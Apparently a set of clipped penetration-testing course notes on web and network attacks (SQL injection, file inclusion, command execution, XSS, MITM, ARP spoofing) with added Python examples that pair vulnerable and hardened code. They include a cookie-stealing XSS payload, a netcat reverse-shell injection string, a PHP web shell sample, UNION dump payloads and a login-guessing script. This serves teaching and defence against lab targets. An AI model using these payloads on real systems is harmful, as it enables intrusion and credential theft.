OWASP ZAP (Zed Attack Proxy) automatically finds vulnerabilities in web applications. Free and easy to use; it can also be used for manual testing. This is the welcome page. Options page, scan policy settings page. Attack this target URL: http://10.0.0.24…
SQL INJECTION WHAT IS SQL? Most websites use a database to store data. Most of the data is stored in it (usernames, passwords, etc.). The web application reads, updates and inserts data in the database. Interaction with the DB is done using SQL. WHY ARE THEY SO DANGEROUS…
SQL INJECTION SQLMAP A tool designed to exploit SQL injections. Works with many DB types: MySQL, MSSQL, etc. >sqlmap --help >sqlmap -u [target URL] Following are examples: sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&…
REMOTE FILE INCLUSION Similar to local file inclusion, but allows an attacker to include files from ANY server: PHP files hosted on another server are executed on the current server. Store the PHP files on the other server as .txt so that server serves them as plain text instead of executing them itself. Pre-condition: set allow_url_include…
How to hack a website? A website is an application installed on a computer -> web application pen-testing. The computer runs an OS + other applications -> server-side attacks. It is managed by humans -> client-side attacks. Target: Metasploitable VM…
WHAT IS A WEBSITE A computer with an OS and some servers (Apache, MySQL, etc.) that contains a web application (PHP, Python, etc.). The web application is executed here and not on the client's machine. How to hack a website? An application installed on a computer. -…
CRAWLING DIRECTORIES Directories/folders inside the web root. Can contain files or other directories. Ex: target.com/directory, plus.google.com/discover Target: Metasploitable2-Linux #!/usr/bin/env python import requests def request(url): try: return…
XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject JavaScript code into the page. The code is executed when the page loads, on the client machine, not on the server. Three main types: 1. Persistent/Stored XSS 2.…
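Added example (not from the course notes): the vulnerable and the escaped way to put user-supplied text into a page, plus the reflection check a tester runs. The comment list is constructed sample data, and the cookie-stealing target host 10.0.0.24 is an assumption.

```python
import html
import re

# Constructed sample of stored comments; the second one is an XSS payload that
# would ship every visitor's cookie to an attacker-controlled host (assumed IP).
COMMENTS = [
    "Nice post!",
    '<script>new Image().src="http://10.0.0.24/?c="+document.cookie</script>',
]


def render_comment_vulnerable(comment):
    """Vulnerable: untrusted text is concatenated straight into the HTML, so
    script inside a stored comment runs for every visitor (stored XSS)."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment):
    """Hardened: HTML-escape the text first. '<' becomes '&lt;', so the browser
    displays the payload as text instead of executing it."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def has_active_script(page):
    """True when a raw <script> tag survived into the rendered HTML."""
    return bool(SCRIPT_TAG.search(page))


PROBE = "<xss1337>"  # harmless unique marker used while testing for reflection


def reflects_unescaped(render, probe=PROBE):
    """Reflected-XSS check: push a unique marker through the render path and
    see whether it comes back unchanged (exploitable) or escaped (safe)."""
    return probe in render(probe)


if __name__ == "__main__":
    for comment in COMMENTS:
        print(render_comment_vulnerable(comment))
        print(render_comment_safe(comment))
```

The same probe technique works against a live target: put the marker in every parameter, fetch the page, and grep the response for the unescaped marker.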
SQL INJECTION Preventing SQLi Filters can be bypassed. Use a blacklist of commands? Still can be bypassed. Use a whitelist? Same issue. -> Use parameterized statements: separate data from SQL code. <?php //$textbox1 = admin' union select # Select * fr…
SQL INJECTION Discovering SQLi in GET Inject via the browser URL. Selecting data from the database: change the number to a big one to get a useful error message, then try different column counts until the query is accepted, using “union select 1,2,3,4,…
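Added example covering both the prevention point (parameterized statements) and the discovery procedure (find the column count with UNION SELECT, then pull the real columns). It is not code from the course; it uses an in-memory SQLite table with constructed sample rows in place of the target's database. SQLite ends a comment with `--`, whereas the notes use MySQL's `#`.

```python
import sqlite3


def setup_db():
    """Constructed stand-in for the target's user table (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "adminpass"), (2, "bob", "password123")])
    conn.commit()
    return conn


def user_info_vulnerable(conn, username):
    """Vulnerable: the request parameter is pasted into the SQL text, so a
    quote in the input closes the string and the rest runs as SQL."""
    sql = ("SELECT id, username, password FROM users "
           "WHERE username = '" + username + "'")
    return conn.execute(sql).fetchall()


def user_info_safe(conn, username):
    """Parameterized: the SQL text is fixed and the value is bound separately,
    so a quote in the input is just a character inside the value."""
    sql = "SELECT id, username, password FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def find_column_count(conn, lookup, max_cols=10):
    """Union-based probe: append UNION SELECT with n marker values and grow n
    until the database accepts the query and the markers appear in the rows.
    Returns None when no injection is found (the safe lookup never echoes)."""
    for n in range(1, max_cols + 1):
        markers = list(range(1001, 1001 + n))
        payload = "x' UNION SELECT " + ",".join(map(str, markers)) + "-- "
        try:
            rows = lookup(conn, payload)
        except sqlite3.OperationalError:
            continue  # "SELECTs ... do not have the same number of result columns"
        if any(markers[0] in row for row in rows):
            return n
    return None


def dump_users(conn, lookup):
    """With the column count known, union the real columns into the output."""
    payload = "x' UNION SELECT id, username, password FROM users-- "
    return lookup(conn, payload)


if __name__ == "__main__":
    db = setup_db()
    print("bypass:", user_info_vulnerable(db, "admin'-- "))
    print("columns:", find_column_count(db, user_info_vulnerable))
    print("dump:", dump_users(db, user_info_vulnerable))
    print("safe:", user_info_safe(db, "admin'-- "), dump_users(db, user_info_safe))
```

Against the vulnerable lookup the probe succeeds at three columns and the dump returns every row; against the parameterized lookup every payload is treated as a literal username and returns nothing.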
VULNS MITIGATION 1. File upload vulns: only allow safe files to be uploaded. 2. Code execution vulns: don't use dangerous functions; filter user input before execution. 3. File inclusion: disable allow_url_fopen & allow_url_include. Use static file in…
LOCAL FILE INCLUSION Allows an attacker to read ANY file on the same server, i.e. access files outside the www directory. Try to read the /etc/passwd file. 1. We know the current file path from the following error. 2. Try to visit the following URL: http://10.0.0.24…
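Added example (not from the course) that models the `page` parameter of an `include()` for the LFI case above, the RFI case, and the mitigation (allow_url_include off plus an allowlist of static file names). The web root `/var/www/html` and the allowed page names are assumptions; the code only computes which path or URL would be included, so it runs offline.

```python
import posixpath

WEB_ROOT = "/var/www/html"                      # assumed document root of the target
ALLOWED_PAGES = {"home", "login", "user-info"}  # assumed set of legitimate pages
URL_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")


def resolve_include_vulnerable(page, allow_url_include=True):
    """Models include($_GET['page']) with no validation.
    - a URL in the parameter is fetched from that server (RFI) when
      allow_url_include is on
    - otherwise the parameter is joined onto the web root and '../' walks
      out of it (LFI)."""
    if allow_url_include and page.lower().startswith(URL_SCHEMES):
        return ("remote", page)
    return ("local", posixpath.normpath(posixpath.join(WEB_ROOT, page)))


def is_inside_web_root(path):
    """Containment check: the normalised path must still start at WEB_ROOT."""
    return posixpath.commonpath([WEB_ROOT, path]) == WEB_ROOT


def resolve_include_safe(page):
    """Hardened: the parameter is never treated as a URL and is only mapped
    through an allowlist of static file names, so no traversal is possible."""
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page: %r" % page)
    path = posixpath.join(WEB_ROOT, page + ".php")
    assert is_inside_web_root(path)
    return ("local", path)


if __name__ == "__main__":
    for p in ("user-info.php", "../../../../etc/passwd", "http://10.0.0.1/shell.txt"):
        kind, target = resolve_include_vulnerable(p)
        print(p, "->", kind, target,
              "" if kind == "remote" or is_inside_web_root(target) else "(outside web root)")
```

Turning `allow_url_include` off only closes the remote case; the traversal still reaches `/etc/passwd`, which is why the allowlist is the part that matters.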
CODE EXECUTION VULNS Allow an attacker to execute OS commands (Windows or Linux). Can be used to get a reverse shell, or to upload any file using the wget command. Code execution commands are attached in the resources. The following examples assume the…
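Added example (not from the course): a ping utility that pastes its parameter into a shell command line, a tokeniser that shows which extra commands the shell would run for a given input, and the hardened version that validates the input as an IP address and passes an argv list with no shell. The `ping -c 3` command shape is an assumption about the target page; nothing is actually executed.

```python
import ipaddress
import shlex

SEPARATORS = {";", "&&", "||", "|", "&"}


def build_ping_vulnerable(host):
    """Vulnerable: the request parameter is pasted into a shell command line,
    the Python equivalent of shell_exec("ping -c 3 " . $_GET['ip']) in PHP."""
    return "ping -c 3 " + host


def shell_commands(cmdline):
    """Tokenise a command line the way /bin/sh would and split it at command
    separators. Returns the list of argv lists the shell would run, which
    makes an injected second command visible."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def build_ping_safe(host):
    """Hardened: validate the parameter as an IP address and build an argv
    list for subprocess.run(argv); no shell ever parses the input."""
    addr = ipaddress.ip_address(host)  # raises ValueError for anything else
    return ["ping", "-c", "3", str(addr)]


if __name__ == "__main__":
    for user_input in ("8.8.8.8", "8.8.8.8; id",
                       "8.8.8.8 && nc -e /bin/sh 10.0.0.24 4444"):
        print(user_input, "->", shell_commands(build_ping_vulnerable(user_input)))
```

If the parameter has to be a host name rather than an address, validate it against a strict host-name pattern instead; the important part is that the value never reaches a shell.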
EXPLOITATION - File Upload VULNS A simple type of vulnerability: the application lets users upload executable files such as PHP. Upload a PHP shell or backdoor, e.g. weevely. 1. Generate the backdoor: weevely generate [password] [file name] 2. Upload the generated file. 3.…
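Added example (not from the course) of the check that would have blocked this upload: the naive filter that trusts the client's Content-Type header, beside a check that strips the directory part, allowlists the extension, refuses server-side extensions hidden in the name and requires the file's magic bytes to match. The sample file contents are constructed.

```python
import posixpath

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
SERVER_SIDE = {"php", "php3", "php4", "php5", "phtml", "phar"}
MAGIC = [
    (b"\xff\xd8\xff", "jpg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
]

# Constructed sample uploads.
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def check_upload_naive(filename, client_content_type):
    """What many apps do: trust the Content-Type the client sent with the file.
    The attacker controls that header, so a PHP shell passes as image/jpeg."""
    return client_content_type in {"image/jpeg", "image/png", "image/gif"}


def detect_image_type(content):
    """Identify the file by its magic bytes, ignoring the name entirely."""
    for magic, kind in MAGIC:
        if content.startswith(magic):
            return kind
    return None


def check_upload(filename, content):
    """Hardened check. Returns (accepted, reason or sanitised name)."""
    name = posixpath.basename(filename.replace("\\", "/"))  # drop directory part
    if "." not in name:
        return False, "no extension"
    stem, ext = name.rsplit(".", 1)
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    if any(part.lower() in SERVER_SIDE for part in stem.split(".")):
        return False, "server-side extension in name"   # shell.php.jpg
    kind = detect_image_type(content)
    if kind is None:
        return False, "unrecognised content"            # shell.jpg holding PHP
    if kind != ("jpg" if ext == "jpeg" else ext):
        return False, "content does not match extension"
    return True, name


if __name__ == "__main__":
    print(check_upload_naive("shell.php", "image/jpeg"))
    for fname, data in (("shell.php", PHP_SHELL), ("shell.jpg", PHP_SHELL),
                        ("shell.php.jpg", JPEG), ("../../cat.png", PNG)):
        print(fname, "->", check_upload(fname, data))
```

Even with this check in place, store uploads outside the web root (or on a host that never executes them) and serve them by id, so that a bypass of the name check cannot become code execution.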
INFORMATION GATHERING IP address. Domain name info. Technologies used. Other websites on the same server. DNS records. Unlisted files, sub-domains, directories. 1. Whois lookup - find info about the owner of the target. () -> http://whois.domaintools…
Guessing Login Information on Login Pages Our target website: http://10.0.0.45/dvwa/login.php #!/usr/bin/env python import requests target_url = "http://10.0.0.45/dvwa/login.php" data_dict = {"username": "dfdfddfd", "pas…
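Added example (not the course's script) of the guessing loop: POST each candidate password and treat the first response that does not contain the failure text as a hit. The field names `username`, `password` and `Login` and the failure marker "Login failed" are assumptions about the DVWA login page; the `fake_post` transport and its credentials are constructed so the loop runs offline, and `http_post` is the real transport with the requests library.

```python
URL = "http://10.0.0.45/dvwa/login.php"
FAILURE_MARKER = "Login failed"  # assumed text DVWA shows on a wrong password


def http_post(url, data):
    """Real transport: POST the form with the requests library."""
    import requests  # imported lazily so the offline demo has no dependency
    return requests.post(url, data=data, timeout=10).text


def guess_password(post, url, username, wordlist, failure_marker=FAILURE_MARKER):
    """Try each candidate password; the first response without the failure
    marker is treated as a hit. Returns (password, attempts_made)."""
    for attempts, password in enumerate(wordlist, 1):
        body = post(url, data={"username": username,
                               "password": password,
                               "Login": "Login"})
        if failure_marker not in body:
            return password, attempts
    return None, len(wordlist)


# Constructed stand-in for the login page so the loop can be exercised offline.
FAKE_CREDS = {"admin": "password"}


def fake_post(url, data):
    if FAKE_CREDS.get(data["username"]) == data["password"]:
        return "<h1>Welcome</h1>"
    return "<p>" + FAILURE_MARKER + "</p>"


if __name__ == "__main__":
    wordlist = ["123456", "letmein", "password", "qwerty"]
    print(guess_password(fake_post, URL, "admin", wordlist))
    # Against the real target:
    # guess_password(http_post, URL, "admin", open("wordlist.txt").read().split())
```

Anything that is not the normal failure page (a lockout notice, a CAPTCHA, a 500 error) also lacks the marker, so confirm a reported hit by logging in with it before trusting the result.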
CRAWLING SPIDER Goal -> Recursively list all links starting from a base URL. 1. Read page HTML. 2. Extract all links. 3. Repeat for each new link that is not already on the list. #!/usr/bin/env python import re import requests from urllib.parse import…
CRAWLING SUMMARY Our crawler so far can guess: subdomains, directories, files. Advantages: -> discovers "hidden" paths, paths the admin does not want us to know about. Disadvantages: -> will not discover everything. Solution: -> Analyse discove…
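Added example (not the course's scripts) combining the two crawling approaches from the directory-guessing and spider sections: wordlist guessing against a base URL, and a spider that extracts href/src links, resolves them, stays on the target host and stops when no new URL appears. The `SITE` dictionary is a constructed stand-in for the target so it runs offline; `requests_get` is the drop-in transport for a real host.

```python
import re
from urllib.parse import urljoin, urlsplit

# Constructed stand-in for the target: URL -> (body). Anything else is a 404.
SITE = {
    "http://10.0.0.24/": '<a href="/about.html">About</a> '
                         '<a href="mutillidae/index.php">Mutillidae</a> '
                         '<a href="http://example.com/">External</a>',
    "http://10.0.0.24/about.html": '<a href="/#top">Top</a><img src="/images/logo.png">',
    "http://10.0.0.24/mutillidae/index.php": '<a href="index.php?page=user-info.php">Users</a>',
    "http://10.0.0.24/mutillidae/index.php?page=user-info.php": "<h1>User Info</h1>",
    "http://10.0.0.24/images/logo.png": "PNG...",
    "http://10.0.0.24/admin/": "<h1>Admin</h1>",  # not linked from anywhere
}


def fake_get(url):
    """Offline transport: (status, body) for the constructed site."""
    return (200, SITE[url]) if url in SITE else (404, "")


def requests_get(url):
    """Real transport with the requests library."""
    import requests
    r = requests.get(url, timeout=5)
    return r.status_code, r.text


LINK_RE = re.compile(r'''(?:href|src)\s*=\s*["']([^"']+)["']''', re.IGNORECASE)


def extract_links(page_url, body):
    """Absolute URLs of every href/src on the page, fragments stripped."""
    return [urljoin(page_url, link).split("#", 1)[0] for link in LINK_RE.findall(body)]


def spider(start_url, get=fake_get):
    """Recursively list every reachable URL on the start host (step 1-3 above).
    Off-host links are recorded nowhere, and each URL is fetched once."""
    host = urlsplit(start_url).netloc
    found, queue = {}, [start_url]
    while queue:
        url = queue.pop(0)
        if url in found:
            continue
        status, body = get(url)
        found[url] = status
        if status != 200:
            continue
        for link in extract_links(url, body):
            if urlsplit(link).netloc == host and link not in found:
                queue.append(link)
    return sorted(u for u, s in found.items() if s == 200)


def guess_directories(base_url, wordlist, get=fake_get):
    """Wordlist guessing: anything that is not a 404 is worth a look."""
    hits = []
    for word in wordlist:
        url = urljoin(base_url, word + "/")
        status, _ = get(url)
        if status != 404:
            hits.append((url, status))
    return hits


if __name__ == "__main__":
    print(spider("http://10.0.0.24/"))
    print(guess_directories("http://10.0.0.24/", ["admin", "backup", "images"]))
```

The two lists complement each other, which is the point of the summary above: the spider never finds `/admin/` because nothing links to it, and the wordlist never finds `index.php?page=user-info.php` because it is not a directory name.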
ARP Poisoning - arpspoof Arpspoof is a tool that is part of a suite called dsniff, which contains a number of network penetration tools. Arpspoof can be used to launch a MITM attack and redirect traffic to flow through our device. 1. Tell the target client th…
Detecting suspicious activities using Wireshark You can add a static ARP table entry for the router's MAC address to prevent the ARP attack, but that is not effective or practical for big companies. Start the attacks from the Kali Linux machine. Analyze the…
Detecting ARP Poisoning Attacks ARP's main security issues: 1. Each ARP request/response is trusted. 2. Clients accept responses even if they did not send a request. We can use the tool called XArp (http://www.xarp.net/) to detect this kind of attack…
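Added example (not from the course) that ties the arpspoof behaviour, the static-entry mitigation and the two ARP weaknesses together: a small ARP-table monitor, in the spirit of the Wireshark "duplicate use of IP" warning or XArp, replayed over a constructed list of ARP replies. The MAC addresses and IPs are constructed sample values.

```python
# Constructed ARP replies as (packet_no, sender_ip, sender_mac, solicited),
# where solicited means this host had just sent a who-has for that IP.
# Packets 3-4 are what arpspoof sends every couple of seconds.
ARP_REPLIES = [
    (1, "10.0.0.1", "aa:aa:aa:aa:aa:01", True),    # router answers our request
    (2, "10.0.0.24", "aa:aa:aa:aa:aa:24", True),   # another host answers
    (3, "10.0.0.1", "de:ad:be:ef:00:01", False),   # attacker claims the router's IP
    (4, "10.0.0.1", "de:ad:be:ef:00:01", False),   # ... and keeps repeating it
]


def detect_arp_spoofing(replies, static_entries=None):
    """Replay ARP replies against an ARP table and return (alerts, table).

    - an unsolicited reply is flagged (weakness 2 above: replies are accepted
      without a request)
    - a reply whose MAC differs from the table entry is flagged (two MACs
      claiming one IP, what Wireshark reports as duplicate IP use)
    - dynamic entries are overwritten as a real OS would do (weakness 1:
      replies are trusted), static entries are kept, which is the mitigation
    """
    static = set(static_entries or {})
    table = dict(static_entries or {})
    alerts = []
    for no, ip, mac, solicited in replies:
        if not solicited:
            alerts.append((no, "unsolicited reply: %s is-at %s" % (ip, mac)))
        known = table.get(ip)
        if known is None:
            table[ip] = mac
        elif known != mac:
            alerts.append((no, "%s claimed by %s, table has %s" % (ip, mac, known)))
            if ip not in static:
                table[ip] = mac  # dynamic entry poisoned
    return alerts, table


if __name__ == "__main__":
    for static in (None, {"10.0.0.1": "aa:aa:aa:aa:aa:01"}):
        alerts, table = detect_arp_spoofing(ARP_REPLIES, static)
        print("static entry:", static)
        for no, msg in alerts:
            print("  packet %d: %s" % (no, msg))
        print("  router entry now:", table["10.0.0.1"])
```

Without the static entry the table ends up pointing the router's IP at the attacker's MAC after packet 3, so only the first attacker packet raises a conflict; with the static entry every repeat is flagged and the entry never changes.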
MITM - Wireshark Wireshark is a network protocol analyser designed to help network administrators keep track of what is happening in their network and analyse all the packets. Wireshark works by logging each packet that flows through the d…
MITM - Code Injection Inject JavaScript or HTML code into pages. The code gets executed on the target machine. Use the --inject plugin. The code can be: 1. Stored in a local file: --js-file or --html-file 2. Stored online: --js-url or --html-url 3. Or you can supply…
MITM - Capturing Screen Of Target & Injecting a Keylogger ScreenShotter plugin: uses HTML5 Canvas to render an accurate screenshot of a client's browser. --screen Load plugin 'ScreenShotter' --interval SECONDS Interval at which screensho…
MITM - DNS Spoofing DNS spoofing allows us to redirect any request for a certain domain to another domain; for example, we can redirect any request for live.com to a fake page! 1. Edit the DNS settings: leafpad /etc/mitmf/mitms.conf 2. Run ettercap to arp…
Session Hijacking What if the user uses the "remember me" feature? In that case authentication happens using the cookies and not the username and password, so instead of sniffing the password we can sniff the cookies and inject…
MITM - bypassing HTTPS Most websites use HTTPS on their login pages. This means the page is validated using an SSL certificate, so if we intercept it our own certificate is invalid and the browser shows a warning to the user. SSLstrip is a tool that can be used…
ARP Poisoning - MITMf MITMf is a framework that allows us to launch a number of MITM attacks. MITMf also starts SSLstrip automatically to bypass HTTPS/SSL. Download and install the MITMf tool from the following website: https://github.com/byt3bl33d3r…
MITM - ARP Poisoning Theory Man In The Middle Attacks - ARP Poisoning This is one of the most dangerous and effective attacks that can be used: it redirects packets to and from any client through our device, and since we have the network key, we…
Nmap Nmap is a network discovery tool that can be used to gather detailed information about any client or network. We shall have a look at some of its uses to discover connected clients and gather information about them. We are going to use Zenmap -…